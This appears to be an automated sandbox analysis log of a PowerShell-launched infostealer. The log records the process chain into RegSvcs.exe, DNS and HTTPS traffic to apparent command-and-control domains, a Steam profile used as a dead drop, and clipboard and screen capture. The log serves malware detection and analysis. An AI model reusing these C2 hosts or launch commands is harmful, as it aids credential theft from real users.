        Source: global trafficDNS traffic detected: DNS query: spookycappy.biz
        Source: global trafficDNS traffic detected: DNS query: truculengisau.biz
        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
        Source: global trafficDNS traffic detected: DNS query: misha-lomonosov.com
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: misha-lomonosov.com
        Source: powershell.exe, 00000000.00000002.1725389766.000002242E46C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
        Source: powershell.exe, 00000000.00000002.1694727177.0000022417DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000000.00000002.1694727177.0000022417D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000000.00000002.1694727177.00000224162C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
        Source: powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000000.00000002.1694727177.0000022417D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: RegSvcs.exe, 00000002.00000002.1828060678.0000000001527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.hllY
        Source: powershell.exe, 00000000.00000002.1694727177.00000224162C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
        Source: RegSvcs.exe, 00000002.00000002.1828060678.0000000001527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fas
        Source: RegSvcs.exe, 00000002.00000002.1828472967.0000000003782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic./
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
        Source: powershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000000.00000002.1694727177.0000022417D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000000.00000002.1694727177.00000224171C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://littlenotii.biz:443/apizn
        Source: RegSvcs.exe, 00000002.00000002.1827156834.0000000001498000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1827156834.00000000014BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/P7N
        Source: RegSvcs.exe, 00000002.00000002.1828060678.000000000153C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/api
        Source: RegSvcs.exe, 00000002.00000002.1828060678.000000000153C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/api_
        Source: RegSvcs.exe, 00000002.00000002.1828060678.000000000153C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/apie
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/buAB
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/l
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com:443/api
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com:443/api$o0
        Source: powershell.exe, 00000000.00000002.1694727177.0000022417DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
        Source: RegSvcs.exe, 00000002.00000002.1827156834.00000000014A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
        Source: RegSvcs.exe, 00000002.00000002.1828060678.0000000001527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
        Source: RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49738 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_004363E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_004363E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00436590 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_00436590
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAC51900_2_00007FFD9BAC5190
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BACA5D90_2_00007FFD9BACA5D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004159752_2_00415975
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00427A502_2_00427A50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00440A0D2_2_00440A0D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004204402_2_00420440
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004104462_2_00410446
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004424602_2_00442460
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00442DE02_2_00442DE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00423E442_2_00423E44
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040AE602_2_0040AE60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0042DEE52_2_0042DEE5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040D6902_2_0040D690
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004087402_2_00408740
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043B7B02_2_0043B7B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004300502_2_00430050
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004110782_2_00411078
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0042A8102_2_0042A810
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004338102_2_00433810
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004270D02_2_004270D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004058E02_2_004058E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0042D8932_2_0042D893
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004148B02_2_004148B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004288BA2_2_004288BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004361402_2_00436140
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040A9102_2_0040A910
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004419102_2_00441910
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004039202_2_00403920
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043912C2_2_0043912C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004091C02_2_004091C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004161DF2_2_004161DF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004311E62_2_004311E6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004321882_2_00432188
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004061902_2_00406190
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0042F1952_2_0042F195
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004421B02_2_004421B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041E2502_2_0041E250
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00441A562_2_00441A56
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041B2002_2_0041B200
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004042D02_2_004042D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041BAD02_2_0041BAD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00433AD02_2_00433AD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00431A882_2_00431A88
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00441A942_2_00441A94
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041AA902_2_0041AA90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00442A902_2_00442A90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004082A02_2_004082A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041CAA02_2_0041CAA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043CAA72_2_0043CAA7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004412B12_2_004412B1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00441B402_2_00441B40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C3702_2_0041C370
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00420B102_2_00420B10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402B202_2_00402B20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00411B202_2_00411B20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0042ABC02_2_0042ABC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00441BD02_2_00441BD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004273A02_2_004273A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043AC402_2_0043AC40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004174512_2_00417451
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00441C602_2_00441C60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004194702_2_00419470
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004074002_2_00407400
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00404C002_2_00404C00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043C4102_2_0043C410
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0042ECD02_2_0042ECD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00439CD82_2_00439CD8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00440CD82_2_00440CD8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00414C9C2_2_00414C9C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0042CCA02_2_0042CCA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E4B02_2_0040E4B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00426D702_2_00426D70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00428D762_2_00428D76
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00422D172_2_00422D17
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004245C02_2_004245C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004165EE2_2_004165EE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004155902_2_00415590
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004095A02_2_004095A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00415E422_2_00415E42
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00413E502_2_00413E50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041BE002_2_0041BE00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004066202_2_00406620
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402EF02_2_00402EF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043EE802_2_0043EE80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043AEA02_2_0043AEA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043974A2_2_0043974A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004197102_2_00419710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041F7102_2_0041F710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C7D02_2_0041C7D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004427E02_2_004427E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00427F8D2_2_00427F8D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00413E40 appears 128 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00407F90 appears 52 times
        Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@4/5@10/2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043B7B0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_0043B7B0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v043ycpy.e0u.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
